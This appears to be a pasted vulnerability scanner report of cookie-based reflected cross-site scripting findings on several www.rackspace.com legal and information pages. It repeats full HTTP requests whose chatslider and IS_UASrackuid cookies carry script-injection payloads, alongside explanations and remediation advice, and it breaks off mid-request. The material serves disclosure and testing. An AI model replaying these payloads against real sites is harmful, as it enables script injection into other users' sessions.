GET /information/legal/mailterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f841dad"%3balert(1)//6893b9b887b; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85b71"%3balert(1)//a4235a5de8c was submitted in the chatslider cookie. This input was echoed as 85b71";alert(1)//a4235a5de8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/mailterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D85b71"%3balert(1)//a4235a5de8c; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cb2e"><script>alert(1)</script>bcb687838d1 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/mailterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D8cb2e"><script>alert(1)</script>bcb687838d1; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6f0c"><script>alert(1)</script>983a65c60f0 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/privacystatement.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c6f0c"><script>alert(1)</script>983a65c60f0; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9708"%3balert(1)//b05d37e631f was submitted in the IS_UASrackuid cookie. This input was echoed as d9708";alert(1)//b05d37e631f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/privacystatement.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8d9708"%3balert(1)//b05d37e631f; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6106"><script>alert(1)</script>81be13425d was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/privacystatement.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Df6106"><script>alert(1)</script>81be13425d; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a1a5"%3balert(1)//f43380476f5 was submitted in the chatslider cookie. This input was echoed as 2a1a5";alert(1)//f43380476f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/privacystatement.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D2a1a5"%3balert(1)//f43380476f5; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c51ad"%3balert(1)//652c6fe05f6 was submitted in the IS_UASrackuid cookie. This input was echoed as c51ad";alert(1)//652c6fe05f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/sharepointappterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c51ad"%3balert(1)//652c6fe05f6; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d03"><script>alert(1)</script>7d13eedcca4 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/sharepointappterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f836d03"><script>alert(1)</script>7d13eedcca4; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e885e"><script>alert(1)</script>1f54eadbec0 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/sharepointappterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=De885e"><script>alert(1)</script>1f54eadbec0; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37bb1"%3balert(1)//adfb6867553 was submitted in the chatslider cookie. This input was echoed as 37bb1";alert(1)//adfb6867553 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/sharepointappterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D37bb1"%3balert(1)//adfb6867553; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9ad6"><script>alert(1)</script>80354848cdb was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/links.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8f9ad6"><script>alert(1)</script>80354848cdb; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa36e"%3balert(1)//22deff37187 was submitted in the IS_UASrackuid cookie. This input was echoed as fa36e";alert(1)//22deff37187 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/links.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8fa36e"%3balert(1)//22deff37187; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0e18"><script>alert(1)</script>ce7f3ffd4c4 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/links.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; 